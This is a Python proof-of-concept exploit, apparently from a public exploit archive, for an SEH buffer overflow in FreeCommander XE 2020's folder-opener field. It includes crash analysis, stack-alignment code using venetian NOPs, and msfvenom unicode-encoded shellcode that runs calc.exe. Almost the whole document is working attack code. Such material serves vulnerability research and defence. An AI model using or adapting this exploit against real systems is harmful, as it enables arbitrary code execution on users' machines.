Share
## https://sploitus.com/exploit?id=1337DAY-ID-34160
#!/usr/bin/python

# Exploit Title:    FreeCommander XE 2020 - Pathname Buffer Overflow (SEH)
# Version:          Build 810a 32-bit
# Software Link:    https://freecommander.com/downloads/FreeCommanderXE-32-public_setup.zip
# Exploit Author:   Hodorsec ([email protected] / [email protected])
# Vendor Homepage:  https://www.freecommander.com
# Tested on:        Win8.1 x64 - Build 9600

# Description:      
# - Exploits the command / folder opener in the main window by entering an overly string and pressing enter: a crash will occur and the Structured Exception Handler kicks in (SEH overflown).
# - Some stack alignment was required, which eventually led to the ability of running shellcode.

# Reproduction:
# - Use indicated OS or manipulate settings for stack alignment: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy and paste the output in the command / folder opener of FreeCommander
# - Check results

# WinDBG initial crash output:
# (db4.648): Access violation - code c0000005 (!!! second chance !!!)
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll - 
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\FreeCommander XE\FreeCommander.exe - 
# eax=00000000 ebx=00000000 ecx=00410041 edx=77e8ffaf esi=00000000 edi=00000000
# eip=00410041 esp=00091620 ebp=00091640 iopl=0         nv up ei pl zr na pe nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
# FreeCommander+0x10041:
# 00410041 0064005c        add     byte ptr [eax+eax+5Ch],ah  ds:002b:0000005c=??

import sys, struct

# Filename
filename = "win8_freecommander_poc.txt"

# Maximum length
maxlen = 2000

# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -b "\x00\x0a\x0d" bufferregister=eax
# Payload size: 512 bytes
shellcode = (
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlzHTBypkPm0aP2ixep190bDTKnpP0bk0RJl4Kobn44KbRKxjoFW0Jo6p1KODlml1Q3LlBNLKpy1XOLMm1UwgrzR1Br7tKobzp2k0JmlDKNlJq2XySPHzaHQR1bkaImPIqWc2k0In8jCmjMyRknT2kzaZ6maIo4leq6ozmm1i7NX7pPul6JccMzXmk3MKtSEhdnxTKb8ldza6srFBklLPKbkqHMLKQhSbkM4dKIqVp1ymtmTldokokQQaIoj21yoK01OOoPZDKzrxkDM1MaZZa4M55UbM0ipkPr0S8nQRkROu7KOWeukHpTuFB1F2HvFBuWMuMio6umlM6CLZjQpIk7pRUlEWKa7mCsBrO1ZypR3ioxU0cS12LosnNpet80eM0AA"
)

# Offsets
seh = 522
nseh = seh - 2

# Venetian NOP
nop = "\x45"

# Aligning EBP with buffer
# ESP being closest to buffer
# ESP = 0018ecc4, Buffer = 0018fb5f: Buffer - ESP = 0x0e9b
align_esp = (   "\x54"              # PUSH ESP
                + nop +             # Padding
                "\x58"              # POP EAX
                + nop +             # Padding
                "\x05\x11\x11"      # "\x05\x00\x10\x00\x11" # 0500100011 add eax,0x11001000 --\
                + nop +             # Padding                                                   |--> Adds 0x0f00 bytes
                "\x2d\x02\x11"      # "\x2d\x00\x01\x00\x11" # 2d00010011 sub eax,0x11000100 --/
                + nop +             # Padding
                "\x40"              # INC EAX # Added due to one-off unicode byte
                + nop +             # Padding
                "\x50"              # PUSH EAX
                + nop +             # Padding
                "\xc3"              # RET
)

# Prefix
prefix = "A" * seh                                              # Fill junk
# NSEH/SEH
nseh = "\x41\x45"                                               # NOP --> INC ECX # ADD [EBP], AL
seh = "\x71\x4c"                                                # POP POP RET
# Suffix
suffix = nop * 3                                                # Align
suffix += align_esp                                             # Align registers; EAX for executing shellcode
suffix += nop * 48                                              # Nopping until buffer
suffix += shellcode                                             # Do some magic
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix))    # Fill junk

# Concatenate string for payload
payload = prefix + nseh + seh + suffix                          # Put it all together

try:
    file = open(filename,"wb")
    file.write(payload)
    file.close()
    print "[+] File " + filename + " with size of " + str(len(payload)) + " created successfully"
except:
    print "[!] Error creating file!"
    sys.exit(0)

#  0day.today [2020-03-30]  #